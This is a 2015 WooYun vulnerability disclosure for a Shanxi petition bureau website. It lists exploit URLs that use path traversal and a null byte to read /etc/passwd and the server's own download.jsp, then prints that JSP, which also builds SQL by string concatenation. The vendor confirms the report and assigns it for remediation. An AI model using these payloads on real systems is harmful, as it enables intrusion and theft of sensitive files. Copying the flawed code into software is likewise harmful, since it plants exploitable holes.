当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091036

漏洞标题:某省信访局文件包含获取敏感信息

相关厂商:cncert国家互联网应急中心

漏洞作者: covertops

提交时间:2015-01-13 11:35

修复时间:2015-02-27 11:36

公开时间:2015-02-27 11:36

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

详细说明:

山西信访局http://www.xfsx.gov.cn
漏洞URL为:
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk,140117

QQ20150110-1@2x.png


QQ20150110-3@2x.png


但是%00后面的不是已经截断了么?
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk包含失败

QQ20150110-2@2x.png


http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../mag/util/download.jsp%00.apk,140117
download.jsp文件内容如下:

<%@ page contentType="text/html; charset=gb2312"%>
<%@ page language="java" import="java.util.*,java.io.*"%>
<%@ page language="java" import="org.genius.data.ConfigParse" %>
<%@ page import="java.text.SimpleDateFormat" %>
<%@ page import="com.bwzy.coke.util.ParamsKeyUtil" %>
<%@ page import="org.springframework.context.ApplicationContext" %>
<%@ page import="org.springframework.context.support.ClassPathXmlApplicationContext" %>
<%@ page import="org.genius.data.IDataConfig" %>
<%@ page import="java.sql.SQLException" %>
<%@ page import="java.sql.ResultSet" %>
<%
//¼Ç¼ÇëÇó¿ªÊ¼Ê±¼ä
Date startdate=new Date();
String nowTime = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(startdate);//
//¼Ç¼¿Í»§¶Ë·ÃÎʵÄurlÐÅÏ¢
String requestURL=request.getLocalAddr() + ":" + request.getLocalPort() + request.getRequestURI() + "?" + request.getQueryString();
//»ñÈ¡·þÎñÀàÐÍ
String businesstype = request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_BUSINESSTYPE);
String type=request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_TYPE);
request.setCharacterEncoding("gb2312");
String pathFolder = new String(request.getParameter("path")) ;
String[] fileName = pathFolder.split(",");
String PathHead = ConfigParse.getFilePath();
String folderL1 = fileName[1].substring(0,2);
String folderL2 = fileName[1].substring(2,4);
String folderL3 = fileName[1].substring(4,6);
String realPath = PathHead + "/" + folderL1 + "/" + folderL2 + "/" + folderL3 + "/" + fileName[0];
String realPathFix = new String(realPath.getBytes("iso-8859-1"),"gbk");
File file = null;
try{
file = new File(realPathFix);
FileInputStream fis = new FileInputStream(file);
BufferedInputStream bis = new BufferedInputStream(fis);
OutputStream os = response.getOutputStream();
response.setContentType("application/octet-stream");
response.setHeader("Content-disposition", "attachment; filename="
+ new String(file.getName().getBytes("GBK"),"iso-8859-1"));
response.addHeader( "Content-Length","" + file.length());
ApplicationContext context = new ClassPathXmlApplicationContext(
"applicationContext.xml");
IDataConfig myData = (IDataConfig) context.getBean("dataConfigProxy");
myData.init();
ResultSet resultSet=null;
int downnum=0;
int id=0;
boolean result=false;
try {
myData.openConnection();
myData.beginTransaction();
String sql1 ="select id,downnum from clientmanager where download='"+request.getParameter("path")+";'";
System.out.println(sql1);
resultSet=myData.executeQuery(sql1);
while (resultSet.next()){
downnum= Integer.parseInt(resultSet.getString("downnum"));
System.out.println("ÏÂÔØ´ÎÊý"+downnum);
id=resultSet.getInt("id");
}
if(downnum>=0){
downnum++;
String sql2 ="update clientmanager set downnum='" + downnum + "' where id='" + id + "'";
myData.addBatch(sql2);
if(myData.commit()){
result=true;
}else{
result=false;
}
}
System.out.println("ÊÇ·ñ²åÈë³É¹¦"+result);
myData.endTransaction();
} catch (SQLException e) {
e.printStackTrace();
}finally{
myData.closeConnection();
}
byte[] buffer = new byte[1024];
try{
while(bis.read(buffer) != -1){
os.write(buffer);
}
}catch(Exception e){}
try{
os.flush();
}catch(Exception e){}
bis.close();
os=null;
try{
response.flushBuffer();
}catch(Exception e){}
out = pageContext.pushBody();
out.clear();
}catch(Exception e){
System.out.println("\""+realPathFix+"\" ÎļþÏÂÔØʧ°Ü");
response.getWriter().print("ÏÂÔØʧ°Ü£¬Î´ÕÒµ½Ö¸¶¨×ÊÔ´.");
}
%>


漏洞证明:

包含的话,信访局应该有不少上传附件的地方吧,没注册

修复方案:

对文件名进行校验

版权声明:转载请注明来源 covertops@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-16 16:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续尝试协调网站管理单位处置。

最新状态:

暂无